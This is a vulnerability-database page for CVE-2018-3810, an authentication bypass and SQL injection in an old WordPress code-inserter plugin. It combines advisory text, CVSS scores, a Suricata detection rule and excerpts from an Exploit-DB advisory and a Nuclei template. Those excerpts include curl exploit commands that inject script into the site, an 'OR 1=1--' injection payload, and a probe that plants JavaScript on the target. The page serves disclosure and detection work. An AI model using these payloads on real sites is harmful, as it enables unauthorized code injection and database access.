CVE-2018-3810
published 2018-01-01CVE-2018-3810: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert…
PriorityP194critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
91.48%
99.8th percentile
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oturia | smart_google_code_inserter | < 3.5 | 3.5 |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=savegooglecode&sgcgoogleanalytic=<script...>&sgcwebtools=&button=Save+Changes
commandaction=saveadwords&delconf=1&oId[]=1 OR 1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on↗
- →Detect unauthenticated POST requests to /options-general.php?page=smartcode with body containing 'sgcgoogleanalytic=' and 'savegooglecode' — the core auth-bypass exploit path for CVE-2018-3810.
- →A secondary SQL injection vector exists via the 'saveadwords' action with the 'oId[]' parameter; monitor POST bodies containing 'action=saveadwords' with SQL metacharacters (e.g., OR 1=1--). ↗
- →For nuclei-style active detection, verify injected payload persistence by issuing a GET to the site root and checking the response body for the injected JavaScript string.
- →The vulnerable function saveGoogleCode() in smartgooglecode.php performs no authorization check; any unauthenticated POST with action=savegooglecode will succeed on unpatched installs (< 3.5). ↗
- ·The Snort/ET rule (sid:2033637) requires SSL decryption to be effective against HTTPS-protected WordPress installations, as noted in the rule metadata.
- ·The nuclei probe injects a live JavaScript payload (console.log/alert) into the target site during detection; use only in authorized testing environments as it modifies site content.
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f59r-v67m-78wf: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3
ghsa_unreviewed·2022-05-14
CVE-2018-3810 [CRITICAL] CWE-287 GHSA-f59r-v67m-78wf: Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
VulnCheck
oturia smart_google_code_inserter Improper Authentication
vulncheck·2018·CVSS 9.8
CVE-2018-3810 [CRITICAL] oturia smart_google_code_inserter Improper Authentication
oturia smart_google_code_inserter Improper Authentication
Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
Affected: oturia smart_google_code_inserter
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statist
Suricata
ET EXPLOIT Smart Google Code Inserter < 3.5 Auth Bypass (CVE-2018-3810)
suricata·2021-08-02·CVSS 9.8
CVE-2018-3810 [CRITICAL] ET EXPLOIT Smart Google Code Inserter < 3.5 Auth Bypass (CVE-2018-3810)
ET EXPLOIT Smart Google Code Inserter [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Smart Google Code Inserter < 3.5 Auth Bypass (CVE-2018-3810)"; flow:established,to_server; http.method; content:"POST"; nocase; http.uri; content:"/options-general.php?page=smartcode"; nocase; endswith; fast_pattern; http.request_body; content:"sgcgoogleanalytic="; nocase; startswith; content:"<script"; nocase; distance:0; content:"savegooglecode"; nocase; reference:url,www.exploit-db.com/exploits/43420; reference:url,github.com/projectdiscovery/nuclei; reference:cve,2018-3810; classtype:attempted-admin; sid:2033637; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Web_Server, created_at 2021_08_02, cve CVE_2018_3810, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_
Exploit-DB
WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection
exploitdb·2018-01-03·CVSS 9.8
CVE-2018-3811 [CRITICAL] WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection
WordPress Plugin Smart Google Code Inserter alert("1");&sgcwebtools=&button=Save+Changes&action=savegooglecode"
"http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"
SQL Injection
curl -k -i --raw -X POST -d "action=saveadwords&delconf=1&oId[]=1 OR
1=1--&ppccap[]=ex:mywplead&ppcpageid[]=1&ppccode[]=bb&nchkdel1=on" "
http://localhost/wp-admin/options-general.php?page=smartcode" -H "Host:
localhost" -H "Content-Type: application/x-www-form-urlencoded"
4. Mitigation
Update to version 3.5
5. Disclosure Timeline
2017/11/29 Vendor contacted
2017/11/30 Vendor acknowleged and released an update
2018/01/01 Advisory released to the public
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]
Nuclei
Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2018-3810 [CRITICAL] Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
Oturia WordPress Smart Google Code Inserter console.log("document.domain")&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- 'console.log("document.domain")'
- type: status
status:
- 200
# digest: 4b0a00483046022100efe6d358757060f977529fbdab30b07b5d72e24f98c3b0df7f0238f5ce90edae0221009f21e028f7e373bbce51e196821e886265505060e55b2478c39e0681466d12e2:922c64590222798bb761d5b6d8e72950
https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.htmlhttps://wordpress.org/plugins/smart-google-code-inserter/#developershttps://wpvulndb.com/vulnerabilities/8987https://www.exploit-db.com/exploits/43420/https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.htmlhttps://wordpress.org/plugins/smart-google-code-inserter/#developershttps://wpvulndb.com/vulnerabilities/8987https://www.exploit-db.com/exploits/43420/
2018-01-01
Published
Exploited in the wild